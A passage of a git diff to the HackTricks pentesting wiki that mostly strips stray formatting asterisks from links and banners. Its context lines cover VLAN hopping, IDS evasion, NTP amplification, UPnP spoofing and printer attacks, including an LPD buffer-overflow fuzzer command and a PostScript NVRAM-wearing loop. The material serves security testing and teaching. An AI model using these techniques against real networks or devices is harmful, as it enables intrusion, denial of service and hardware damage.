Controller manager depends on this date to know which changes have occurred (available resourced of the nodes, number of pods running...) * **Cloud controller manager**: Is the specific controller for flow controls and applications, i.e: if you have clusters in AWS or OpenStack. Note that as the might be several nodes (running several pods), there might also be several master processes which their access to the Api server load balanced and their etcd synchronized. @@ -47,7 +47,7 @@ When a pod creates data that shouldn't be lost when the pod disappear it should * **Deployments**: This is where the components to be run by kubernetes are indicated. A user usually won't work directly with pods, pods are abstracted in **ReplicaSets** (number of same pods replicated), which are run via deployments. Note that deployments are for **stateless** applications. The minimum configuration for a deployment is the name and the image to run. * **StatefulSet**: This component is meant specifically for applications like **databases** which needs to **access the same storage**. * **Ingress**: This is the configuration that is use to **expose the application publicly with an URL**. Note that this can also be done using external services, but this is the correct way to expose the application. - * If you implement an Ingress you will need to create **Ingress Controllers**. The Ingress Controller is a **pod** that will be the endpoint that will receive the requests and check and will load balance them to the services. the ingress controller will **send the request based on the ingress rules configured**. Note that the ingress rules can point to different paths or even subdomains to different internal kubernetes services. + * If you implement an Ingress you will need to create **Ingress Controllers**. The Ingress Controller is a **pod** that will be the endpoint that will receive the requests and check and will load balance them to the services. the ingress controller will **send the request based on the ingress rules configured**. Note that the ingress rules can point to different paths or even subdomains to different internal kubernetes services. * A better security practice would be to use a cloud load balancer or a proxy server as entrypoint to don't have any part of the Kubernetes cluster exposed. * When request that doesn't match any ingress rule is received, the ingress controller will direct it to the "**Default backend**". You can `describe` the ingress controller to get the address of this parameter. * `minikube addons enable ingress` diff --git a/pentesting/pentesting-kubernetes/kubernetes-hardening/README.md b/pentesting/pentesting-kubernetes/kubernetes-hardening/README.md index 9f992d65..7ff12cca 100644 --- a/pentesting/pentesting-kubernetes/kubernetes-hardening/README.md +++ b/pentesting/pentesting-kubernetes/kubernetes-hardening/README.md @@ -30,11 +30,11 @@ This tool also has the argument `autofix` to **automatically fix detected issues ### **Kicks** -****[**KICS**](https://github.com/Checkmarx/kics) finds **security vulnerabilities**, compliance issues, and infrastructure misconfigurations in the following **Infrastructure as Code solutions**: Terraform, Kubernetes, Docker, AWS CloudFormation, Ansible, Helm, Microsoft ARM, and OpenAPI 3.0 specifications +[**KICS**](https://github.com/Checkmarx/kics) finds **security vulnerabilities**, compliance issues, and infrastructure misconfigurations in the following **Infrastructure as Code solutions**: Terraform, Kubernetes, Docker, AWS CloudFormation, Ansible, Helm, Microsoft ARM, and OpenAPI 3.0 specifications ### Checkov -****[**Checkov**](https://github.com/bridgecrewio/checkov) is a static code analysis tool for infrastructure-as-code. +[**Checkov**](https://github.com/bridgecrewio/checkov) is a static code analysis tool for infrastructure-as-code. It scans cloud infrastructure provisioned using [Terraform](https://terraform.io), Terraform plan, [Cloudformation](https://aws.amazon.com/cloudformation/), [AWS SAM](https://aws.amazon.com/serverless/sam/), [Kubernetes](https://kubernetes.io), [Dockerfile](https://www.docker.com), [Serverless](https://www.serverless.com) or [ARM Templates](https://docs.microsoft.com/en-us/azure/azure-resource-manager/templates/overview) and detects security and compliance misconfigurations using graph-based scanning. @@ -60,7 +60,7 @@ It's very important to **protect the access to the Kubernetes Api Server** as a It's important to secure both the **access** (**whitelist** origins to access the API Server and deny any other connection) and the [**authentication**](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-authentication-authorization/) (following the principle of **least** **privilege**). And definitely **never** **allow** **anonymous** **requests**. **Common Request process:**\ -****User or K8s ServiceAccount –> Authentication –> Authorization –> Admission Control. +User or K8s ServiceAccount –> Authentication –> Authorization –> Admission Control. **Tips**: @@ -122,7 +122,7 @@ You should update your Kubernetes environment as frequently as necessary to have * Dependencies up to date. * Bug and security patches. -****[**Release cycles**](https://kubernetes.io/docs/setup/release/version-skew-policy/): Each 3 months there is a new minor release -- 1.20.3 = 1(Major).20(Minor).3(patch) +[**Release cycles**](https://kubernetes.io/docs/setup/release/version-skew-policy/): Each 3 months there is a new minor release -- 1.20.3 = 1(Major).20(Minor).3(patch) **The best way to update a Kubernetes Cluster is (from** [**here**](https://kubernetes.io/docs/tasks/administer-cluster/cluster-upgrade/)**):** diff --git a/pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-networkpolicies.md b/pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-networkpolicies.md index 60cb8e5b..7fe24d72 100644 --- a/pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-networkpolicies.md +++ b/pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-networkpolicies.md @@ -1,6 +1,6 @@ # Kubernetes NetworkPolicies -**This tutorial was taken from** [**https://madhuakula.com/kubernetes-goat/scenarios/scenario-20.html**](https://madhuakula.com/kubernetes-goat/scenarios/scenario-20.html)**** +**This tutorial was taken from** [**https://madhuakula.com/kubernetes-goat/scenarios/scenario-20.html**](https://madhuakula.com/kubernetes-goat/scenarios/scenario-20.html) ### Scenario Information @@ -111,7 +111,7 @@ kubectl delete networkpolicy web-deny-all A tool/framework to teach you how to create a network policy using the Editor. It explains basic network policy concepts and guides you through the steps needed to achieve the desired least-privilege security and zero-trust concepts. -* **Navigate to the Cilium Editor** [**https://editor.cilium.io/**](https://editor.cilium.io)**** +* **Navigate to the Cilium Editor** [**https://editor.cilium.io/**](https://editor.cilium.io) ![Scenario 20 NSP Cilium](https://madhuakula.com/kubernetes-goat/scenarios/images/sc-20-2.png) diff --git a/pentesting/pentesting-ldap.md b/pentesting/pentesting-ldap.md index e90669c7..d4b9ac45 100644 --- a/pentesting/pentesting-ldap.md +++ b/pentesting/pentesting-ldap.md @@ -293,7 +293,7 @@ done ### Apache Directory -\*\*\*\*[**Download Apache Directory from here**](https://directory.apache.org/studio/download/download-linux.html). You can find an [example of how to use this tool here](https://www.youtube.com/watch?v=VofMBg2VLnw\&t=3840s). +[**Download Apache Directory from here**](https://directory.apache.org/studio/download/download-linux.html). You can find an [example of how to use this tool here](https://www.youtube.com/watch?v=VofMBg2VLnw\&t=3840s). ### jxplorer diff --git a/pentesting/pentesting-mssql-microsoft-sql-server.md b/pentesting/pentesting-mssql-microsoft-sql-server.md index ba72f00a..158094f8 100644 --- a/pentesting/pentesting-mssql-microsoft-sql-server.md +++ b/pentesting/pentesting-mssql-microsoft-sql-server.md @@ -7,9 +7,9 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtai Discover **The PEASS Family**, our collection of exclusive **NFTs** -Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)**** +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **** or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} diff --git a/pentesting/pentesting-mysql.md b/pentesting/pentesting-mysql.md index 3b8d2389..7cf764b4 100644 --- a/pentesting/pentesting-mysql.md +++ b/pentesting/pentesting-mysql.md @@ -3,7 +3,7 @@ ## **Basic Information** **MySQL** is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (**SQL**).\ -\_\*\*\_From [here](https://www.siteground.com/tutorials/php-mysql/mysql/). +\_**\_From [here](https://www.siteground.com/tutorials/php-mysql/mysql/). **Default port:** 3306 diff --git a/pentesting/pentesting-network/README.md b/pentesting/pentesting-network/README.md index b0550abc..f41d1be1 100644 --- a/pentesting/pentesting-network/README.md +++ b/pentesting/pentesting-network/README.md @@ -5,11 +5,11 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtain a **PDF copy of Hacktricks**, and more? Discover the **brand new** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop?frequency=one-time) **for individuals and companies.** -Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)**** +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)**** +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **** or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} @@ -294,7 +294,7 @@ In modern switches this vulnerability has been fixed. #### Dynamic Trunking -Many switches support the Dynamic Trunking Protocol (DTP) by default, however, which an adversary can abuse to **emulate a switch and receive traffic across all VLANs**. The tool [_**dtpscan.sh**_](https://github.com/commonexploits/dtpscan) \*\*\*\* can sniff an interface and **reports if switch is in Default mode, trunk, dynamic, auto or access mode** (this is the only one that would avoid VLAN hopping). The tool will indicate if the switch is vulnerable or not. +Many switches support the Dynamic Trunking Protocol (DTP) by default, however, which an adversary can abuse to **emulate a switch and receive traffic across all VLANs**. The tool [_**dtpscan.sh**_](https://github.com/commonexploits/dtpscan) can sniff an interface and **reports if switch is in Default mode, trunk, dynamic, auto or access mode** (this is the only one that would avoid VLAN hopping). The tool will indicate if the switch is vulnerable or not. If it was discovered that the the network is vulnerable, you can use _**Yersinia**_ to launch an "**enable trunking**" using protocol "**DTP**" and you will be able to see network packets from all the VLANs. @@ -346,7 +346,7 @@ ifconfig eth1.20 192.168.1.2 netmask 255.255.255.0 up #### Automatic VLAN Hopper -The discussed attack of **Dynamic Trunking and creating virtual interfaces an discovering hosts inside** other VLANs are **automatically performed** by the tool: [**https://github.com/nccgroup/vlan-hopping---frogger**](https://github.com/nccgroup/vlan-hopping---frogger)\*\*\*\* +The discussed attack of **Dynamic Trunking and creating virtual interfaces an discovering hosts inside** other VLANs are **automatically performed** by the tool: [**https://github.com/nccgroup/vlan-hopping---frogger**](https://github.com/nccgroup/vlan-hopping---frogger) #### Double Tagging @@ -429,7 +429,7 @@ You could also use [scapy](https://github.com/secdev/scapy/). Be sure to install Although intended for use by the employees’ Voice over Internet Protocol (VoIP) phones, modern VoIP devices are increasingly integrated with IoT devices. Many employees can now unlock doors using a special phone number, control the room’s thermostat... -The tool [**voiphopper**](http://voiphopper.sourceforge.net) \*\*\*\* mimics the behavior of a VoIP phone in Cisco, Avaya, Nortel, and Alcatel-Lucent environments. It automatically discovers the correct VLAN ID for the voice network using one of the device discovery protocols it supports, such as the Cisco Discovery Protocol (CDP), the Dynamic Host Configuration Protocol (DHCP), Link Layer Discovery Protocol Media Endpoint Discovery (LLDP-MED), and 802.1Q ARP. +The tool [**voiphopper**](http://voiphopper.sourceforge.net) mimics the behavior of a VoIP phone in Cisco, Avaya, Nortel, and Alcatel-Lucent environments. It automatically discovers the correct VLAN ID for the voice network using one of the device discovery protocols it supports, such as the Cisco Discovery Protocol (CDP), the Dynamic Host Configuration Protocol (DHCP), Link Layer Discovery Protocol Media Endpoint Discovery (LLDP-MED), and 802.1Q ARP. **VoIP Hopper** supports **three** CDP modes. The **sniff** mode inspects the network packets and attempts to locate the VLAN ID. To use it, set the **`-c`** parameter to `0`. The **spoof** mode generates custom packets similar to the ones a real VoIP device would transmit in the corporate network. To use it, set the **`-c`** parameter to **`1`**. The spoof with a **pre-madepacket** mode sends the same packets as a Cisco 7971G-GE IP phone. To use it, set the **`-c`** parameter to **`2`**. @@ -501,7 +501,7 @@ You can use Responder DHCP script (_/usr/share/responder/DHCP.py_) to establish Here are some of the attack tactics that can be used against 802.1X implementations: * Active brute-force password grinding via EAP -* Attacking the RADIUS server with malformed EAP content _\*\*_(exploits) +* Attacking the RADIUS server with malformed EAP content _**_(exploits) * EAP message capture and offline password cracking (EAP-MD5 and PEAP) * Forcing EAP-MD5 authentication to bypass TLS certificate validation * Injecting malicious network traffic upon authenticating using a hub or similar @@ -538,9 +538,9 @@ Most Open Shortest Path First (OSPF) implementations use MD5 to provide authenti For more information about how to attack this protocol go to the book _**Network Security Assessment: Know Your Network (3rd edition).**_ -_\*\*\*\*_ +__ -You can find some more information about network attacks [here](https://github.com/Sab0tag3d/MITM-cheatsheet). _\*\*(TODO: Read it all and all new attacks if any)_ +You can find some more information about network attacks [here](https://github.com/Sab0tag3d/MITM-cheatsheet). _**(TODO: Read it all and all new attacks if any)_ ## **Spoofing** diff --git a/pentesting/pentesting-network/ids-evasion.md b/pentesting/pentesting-network/ids-evasion.md index 188fdd7e..e8846741 100644 --- a/pentesting/pentesting-network/ids-evasion.md +++ b/pentesting/pentesting-network/ids-evasion.md @@ -20,7 +20,7 @@ Just fragment the packets and send them. If the IDS/IPS doesn't have the ability ## **Invalid** _**checksum**_ -Sensors usually don't calculate checksum for performance reasons. _****_ So an attacker can send a packet that will be **interpreted by the sensor but rejected by the final host.** Example: +Sensors usually don't calculate checksum for performance reasons. __ So an attacker can send a packet that will be **interpreted by the sensor but rejected by the final host.** Example: Send a packet with the flag RST and a invalid checksum, so then, the IPS/IDS may thing that this packet is going to close the connection, but the final host will discard the packet as the checksum is invalid. diff --git a/pentesting/pentesting-network/spoofing-ssdp-and-upnp-devices.md b/pentesting/pentesting-network/spoofing-ssdp-and-upnp-devices.md index ec95d281..32c1abae 100644 --- a/pentesting/pentesting-network/spoofing-ssdp-and-upnp-devices.md +++ b/pentesting/pentesting-network/spoofing-ssdp-and-upnp-devices.md @@ -1,6 +1,6 @@ # Spoofing SSDP and UPnP Devices with EvilSSDP -**This post was copied from** [**https://www.hackingarticles.in/evil-ssdp-spoofing-the-ssdp-and-upnp-devices/**](https://www.hackingarticles.in/evil-ssdp-spoofing-the-ssdp-and-upnp-devices/)**** +**This post was copied from** [**https://www.hackingarticles.in/evil-ssdp-spoofing-the-ssdp-and-upnp-devices/**](https://www.hackingarticles.in/evil-ssdp-spoofing-the-ssdp-and-upnp-devices/) ## **Introduction** @@ -67,24 +67,24 @@ In the **Umap tool section** you can find a way to exploit this vector. ### **Miranda** -****[**Miranda**](https://raw.githubusercontent.com/0x90/miranda-upnp/master/src/miranda.py) **** is a **python2** **UPnP** **client** that can be useful to **discover** UPnP services, get the **details** and **send commands** to them: +[**Miranda**](https://raw.githubusercontent.com/0x90/miranda-upnp/master/src/miranda.py) is a **python2** **UPnP** **client** that can be useful to **discover** UPnP services, get the **details** and **send commands** to them: ``` upnp> msearch Entering discovery mode for 'upnp:rootdevice', Ctl+C to stop... -**************************************************************** + SSDP reply message from 192.168.1.254:49152 XML file is located at http://192.168.1.254:49152/wps_device.xml Device is running Unspecified, UPnP/1.0, Unspecified -**************************************************************** -**************************************************************** + + SSDP reply message from 192.168.1.254:53350 XML file is located at http://192.168.1.254:53350/37699b14/rootDesc.xml Device is running Linux/3.4.11 UPnP/1.0 MiniUPnPd/1.9 -**************************************************************** + upnp> host list [0] 192.168.1.254:49152 @@ -118,11 +118,11 @@ upnp> host send 0 WFADevice WFAWLANConfig PutMessage ### Umap -The tool [**umap**](https://github.com/0x90/upnp-arsenal/blob/master/umap-bypass.py) **** can help to **discover upnp commands** that are **available** from **WAN** interfaces even if those aren't announced in those interfaces (this is because of buggy implementations). Note that if, for example, you are testing a router and you have access to it from both the internal network and the WAN interface, you should try to **enumerate all the services from the internal** network (using **miranda** for example) and then try to **call those services from the external** network. +The tool [**umap**](https://github.com/0x90/upnp-arsenal/blob/master/umap-bypass.py) can help to **discover upnp commands** that are **available** from **WAN** interfaces even if those aren't announced in those interfaces (this is because of buggy implementations). Note that if, for example, you are testing a router and you have access to it from both the internal network and the WAN interface, you should try to **enumerate all the services from the internal** network (using **miranda** for example) and then try to **call those services from the external** network. ### **Other UPnP Tools** -Find in [**https://github.com/0x90/upnp-arsenal**](https://github.com/0x90/upnp-arsenal) **** more upnp tools +Find in [**https://github.com/0x90/upnp-arsenal**](https://github.com/0x90/upnp-arsenal) more upnp tools ### **Evil SSDP** diff --git a/pentesting/pentesting-ntp.md b/pentesting/pentesting-ntp.md index 152b6646..99cc7162 100644 --- a/pentesting/pentesting-ntp.md +++ b/pentesting/pentesting-ntp.md @@ -33,7 +33,7 @@ nmap -sU -sV --script "ntp* and (discovery or vuln) and not (dos or brute)" -p 1 ## NTP Amplification Attack -\*\*\*\*[**How NTP DDoS Attack Works**](https://resources.infosecinstitute.com/network-time-protocol-ntp-threats-countermeasures/#gref) +[**How NTP DDoS Attack Works**](https://resources.infosecinstitute.com/network-time-protocol-ntp-threats-countermeasures/#gref) NTP protocol by design uses UDP to operate, which does not require any handshake like TCP, thus no record of the request. So, NTP DDoS amplification attack begins when an attacker crafts packets with a spoofed source IP to make the packets appear to be coming from the intended target and sends them to NTP server. Attacker initially crafts the packet of few bytes, but NTP responds with a large amount of data thus adding to amplification of this attack. diff --git a/pentesting/pentesting-postgresql.md b/pentesting/pentesting-postgresql.md index cd5d950a..ca23e327 100644 --- a/pentesting/pentesting-postgresql.md +++ b/pentesting/pentesting-postgresql.md @@ -2,7 +2,7 @@ ## **Basic Information** -**PostgreSQL** is an _\*\*_open source object-relational database system that uses and extends the SQL language. +**PostgreSQL** is an _**_open source object-relational database system that uses and extends the SQL language. **Default port:** 5432, and if this port is already in use it seems that postgresql will use the next port (5433 probably) which is not in use. diff --git a/pentesting/pentesting-printers/README.md b/pentesting/pentesting-printers/README.md index 8408ebf2..ed4c383f 100644 --- a/pentesting/pentesting-printers/README.md +++ b/pentesting/pentesting-printers/README.md @@ -126,53 +126,53 @@ While plugged-in USB drives do **not offer a bidirectional channel**, their usag ### Cross-site printing Abusing **client web request** an attacker can **abuse arbitrary printers** inside the internal network of the client connected to his malicious web page.\ -[**Learn how can this be possible here.**](cross-site-printing.md)**** +[**Learn how can this be possible here.**](cross-site-printing.md) ### Abusing Spooler service in AD If you can find any **Spool service listening** inside the domain, you may be able to **abuse** is to **obtain new credentials** and **escalate privileges**.\ -[**More information about how to find a abuse Spooler services here.**](../../windows/active-directory-methodology/printers-spooler-service-abuse.md)**** +[**More information about how to find a abuse Spooler services here.**](../../windows/active-directory-methodology/printers-spooler-service-abuse.md) ## Privilege Escalation ### Factory Defaults There are several possible ways to **reset** a device to factory defaults, and this is a security-critical functionality as it **overwrites protection mechanisms** like user-set passwords.\ -[**Learn more here.**](factory-defaults.md)**** +[**Learn more here.**](factory-defaults.md) ### **Accounting Bypass** You may be able to **impersonate existent or non-existent users** to print pages using their accounts or **manipulate** the hardware or software **counter** to be able to print more pages.\ -[**Learn how to do it here.**](accounting-bypass.md)**** +[**Learn how to do it here.**](accounting-bypass.md) ### **Scanner and Fax** Accessing the Scanner of Fax functionalities you may be able to access other functionalities, but this all of this is vendor-dependent.\ -****[**Learn more here.**](scanner-and-fax.md)**** +[**Learn more here.**](scanner-and-fax.md) ## **Print job access** ### **Print Job Retention** Jobs can be **retained in memory** and be **printed** again in a **later moment from the control panel**, or using **PostScript** you can even **remotely access all the jobs that are going to be printed, download them** and print them.\ -[**Learn more here.**](print-job-retention.md)**** +[**Learn more here.**](print-job-retention.md) ### **Print Job Manipulation** You can **add new content** to the pages that are printed, **change all the content** that is going to be printed or even **replace just certain letters or words.**\ -****[**Learn how to do it here.**](print-job-manipulation.md)**** +[**Learn how to do it here.**](print-job-manipulation.md) ## **Information Disclosure** ### **Memory access** You may be able to **dump** the **NVRAM** memory and **extract sensitive** info (like passwords) from there.\ -[**Read how to do that here.**](memory-access.md)**** +[**Read how to do that here.**](memory-access.md) ### **File system access** You may be able to **access the file system** abusing **PJL** or **PostScript**.\ -[**Read how to do that here.**](file-system-access.md)**** +[**Read how to do that here.**](file-system-access.md) ### **Credentials Disclosure/Brute-Force** @@ -184,31 +184,31 @@ You may be able to **disclosure the password** being using abusing **SNMP** or t ### **Buffer Overflows** Several **buffer overflows** have been **found** already in **PJL input** and in the **LPD daemon**, and there could be more.\ -[**Read this for more information.**](buffer-overflows.md)**** +[**Read this for more information.**](buffer-overflows.md) ### Firmware updates You may be able to **make the printer update the driver to a malicious one** specially crafted by you.\ -[**Read this for more information.**](firmware-updates.md)**** +[**Read this for more information.**](firmware-updates.md) ### **Software Packages** - printer vendors have started to introduce the **possibility to install custom software on their devices** but information is not publicly available. The feature of writing customized software which runs on printers was intended and is reserved for resellers and contractors.\ -[**Read more about this here.**](software-packages.md)**** +printer vendors have started to introduce the **possibility to install custom software on their devices** but information is not publicly available. The feature of writing customized software which runs on printers was intended and is reserved for resellers and contractors.\ +[**Read more about this here.**](software-packages.md) ## **Denial of service** ### **Transmission channel** Occupying all the **connections** and **increasing** the **timeout** of the server could lead to a DoS.\ -[**Learn more about this here.**](transmission-channel.md)**** +[**Learn more about this here.**](transmission-channel.md) ### **Document Processing** You can use **PostScript** and **PJL** to perform **infinite loops**, **redefine commands** to avoid any printing, **turn off** any printing functionality or even **set the printer in offline mode**.\ -[**Learn more about this here.**](document-processing.md)**** +[**Learn more about this here.**](document-processing.md) ### **Physical damage** One could **abuse PJL** or **PostScript** to **write** in the **NVRAM** hundreds of thousands of times with the goal of **breaking the chip** or at least make the **parameters be frozen** intro the factory default ones.\ -[**Learn more about this here.**](physical-damage.md)**** +[**Learn more about this here.**](physical-damage.md) diff --git a/pentesting/pentesting-printers/buffer-overflows.md b/pentesting/pentesting-printers/buffer-overflows.md index 6fa2adfb..1aaf32d1 100644 --- a/pentesting/pentesting-printers/buffer-overflows.md +++ b/pentesting/pentesting-printers/buffer-overflows.md @@ -45,4 +45,4 @@ A simple **LPD fuzzer** to test for buffer overflows can be created using the `l ./lpdtest.py printer in "`python -c 'print "x"*150'`" ``` -**You can find more information about these attacks in** [**http://hacking-printers.net/wiki/index.php/Buffer\_overflows**](http://hacking-printers.net/wiki/index.php/Buffer\_overflows)**** +**You can find more information about these attacks in** [**http://hacking-printers.net/wiki/index.php/Buffer\_overflows**](http://hacking-printers.net/wiki/index.php/Buffer\_overflows) diff --git a/pentesting/pentesting-printers/credentials-disclosure-brute-force.md b/pentesting/pentesting-printers/credentials-disclosure-brute-force.md index 9298f3bf..f71bff2b 100644 --- a/pentesting/pentesting-printers/credentials-disclosure-brute-force.md +++ b/pentesting/pentesting-printers/credentials-disclosure-brute-force.md @@ -83,4 +83,4 @@ Device unlocked with password: 0 -**More information about Password Disclosure and Brute-Force in** [**http://hacking-printers.net/wiki/index.php/Credential\_disclosure**](http://hacking-printers.net/wiki/index.php/Credential\_disclosure)**** +**More information about Password Disclosure and Brute-Force in** [**http://hacking-printers.net/wiki/index.php/Credential\_disclosure**](http://hacking-printers.net/wiki/index.php/Credential\_disclosure) diff --git a/pentesting/pentesting-printers/document-processing.md b/pentesting/pentesting-printers/document-processing.md index dbf5b59e..df6becce 100644 --- a/pentesting/pentesting-printers/document-processing.md +++ b/pentesting/pentesting-printers/document-processing.md @@ -89,4 +89,4 @@ from printing or re-connecting to the device. Press CTRL+C to abort. Taking printer offline in... 10 9 8 7 6 5 4 3 2 1 KABOOM! ``` -**Learn more about these attacks in** [**http://hacking-printers.net/wiki/index.php/Document\_processing**](http://hacking-printers.net/wiki/index.php/Document\_processing)**** +**Learn more about these attacks in** [**http://hacking-printers.net/wiki/index.php/Document\_processing**](http://hacking-printers.net/wiki/index.php/Document\_processing) diff --git a/pentesting/pentesting-printers/file-system-access.md b/pentesting/pentesting-printers/file-system-access.md index cac7110e..cf4274c0 100644 --- a/pentesting/pentesting-printers/file-system-access.md +++ b/pentesting/pentesting-printers/file-system-access.md @@ -84,4 +84,4 @@ d - webServer d - xps ``` -**Learn more about possible sandbox bypasses using PostScript and PJL limitations in** [**http://hacking-printers.net/wiki/index.php/File\_system\_access**](http://hacking-printers.net/wiki/index.php/File\_system\_access)**** +**Learn more about possible sandbox bypasses using PostScript and PJL limitations in** [**http://hacking-printers.net/wiki/index.php/File\_system\_access**](http://hacking-printers.net/wiki/index.php/File\_system\_access) diff --git a/pentesting/pentesting-printers/memory-access.md b/pentesting/pentesting-printers/memory-access.md index 0d39f2c3..24a4c529 100644 --- a/pentesting/pentesting-printers/memory-access.md +++ b/pentesting/pentesting-printers/memory-access.md @@ -34,4 +34,4 @@ Certain **Xerox printer models** have a proprietary **PostScript** `vxmemfetch` } repeat ``` -**More information here:** [**http://hacking-printers.net/wiki/index.php/Memory\_access**](http://hacking-printers.net/wiki/index.php/Memory\_access)**** +**More information here:** [**http://hacking-printers.net/wiki/index.php/Memory\_access**](http://hacking-printers.net/wiki/index.php/Memory\_access) diff --git a/pentesting/pentesting-printers/physical-damage.md b/pentesting/pentesting-printers/physical-damage.md index e28566e0..e4c35192 100644 --- a/pentesting/pentesting-printers/physical-damage.md +++ b/pentesting/pentesting-printers/physical-damage.md @@ -1,6 +1,6 @@ # Physical Damage - Long-term settings for printers and other embedded devices are stored in non-volatile memory ([NVRAM](https://en.wikipedia.org/wiki/Non-volatile\_random-access\_memory)) which is traditionally implemented either as [EEPROM](https://en.wikipedia.org/wiki/EEPROM) or as [flash memory](https://en.wikipedia.org/wiki/Flash\_memory). Both components have a limited lifetime. Today, vendors of flash memory guarantee about 100,000 rewrites before any write errors may occur. +Long-term settings for printers and other embedded devices are stored in non-volatile memory ([NVRAM](https://en.wikipedia.org/wiki/Non-volatile\_random-access\_memory)) which is traditionally implemented either as [EEPROM](https://en.wikipedia.org/wiki/EEPROM) or as [flash memory](https://en.wikipedia.org/wiki/Flash\_memory). Both components have a limited lifetime. Today, vendors of flash memory guarantee about 100,000 rewrites before any write errors may occur. ### PJL @@ -42,4 +42,4 @@ PostScript can run a script that corrupts its own NVRAM: } loop ``` -**More information about these techniques can be found in** [**http://hacking-printers.net/wiki/index.php/Physical\_damage**](http://hacking-printers.net/wiki/index.php/Physical\_damage)**** +**More information about these techniques can be found in** [**http://hacking-printers.net/wiki/index.php/Physical\_damage**](http://hacking-printers.net/wiki/index.php/Physical\_damage) diff --git a/pentesting/pentesting-printers/transmission-channel.md b/pentesting/pentesting-printers/transmission-channel.md index cdda1cbf..31b8f28c 100644 --- a/pentesting/pentesting-printers/transmission-channel.md +++ b/pentesting/pentesting-printers/transmission-channel.md @@ -1,6 +1,6 @@ # Transmission channel -If print jobs are processed in series – which is assumed for most devices – only one job can be handled at a time. If this job does not terminate the printing channel effectively is blocked until a timeout is triggered, preventing legitimate users from printing. +If print jobs are processed in series – which is assumed for most devices – only one job can be handled at a time. If this job does not terminate the printing channel effectively is blocked until a timeout is triggered, preventing legitimate users from printing. Basic DoS: @@ -34,4 +34,4 @@ TIMEOUT=15 [2 RANGE] While the PJL reference specifies a maximum timeout of 300 seconds, in practice maximum PJL timeouts may range from 15 to 2147483 seconds.\ Note that even print jobs received from other printing channels like IPP or LPD are not processed anymore as long as the connection is kept open. -**Learn more about this attack in** [**http://hacking-printers.net/wiki/index.php/Transmission\_channel**](http://hacking-printers.net/wiki/index.php/Transmission\_channel)**** +**Learn more about this attack in** [**http://hacking-printers.net/wiki/index.php/Transmission\_channel**](http://hacking-printers.net/wiki/index.php/Transmission\_channel) diff --git a/pentesting/pentesting-rsh.md b/pentesting/pentesting-rsh.md index 9e8d9e62..c4adccd9 100644 --- a/pentesting/pentesting-rsh.md +++ b/pentesting/pentesting-rsh.md @@ -17,5 +17,5 @@ rsh domain/user@ rsh domain\\user@ ``` -### [**Brute Force**](../brute-force.md#rsh)**** +### [**Brute Force**](../brute-force.md#rsh) diff --git a/pentesting/pentesting-smb.md b/pentesting/pentesting-smb.md index e72ca048..e6e0f896 100644 --- a/pentesting/pentesting-smb.md +++ b/pentesting/pentesting-smb.md @@ -7,9 +7,9 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtai Discover **The PEASS Family**, our collection of exclusive **NFTs** -Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)**** +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **** or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} @@ -26,7 +26,7 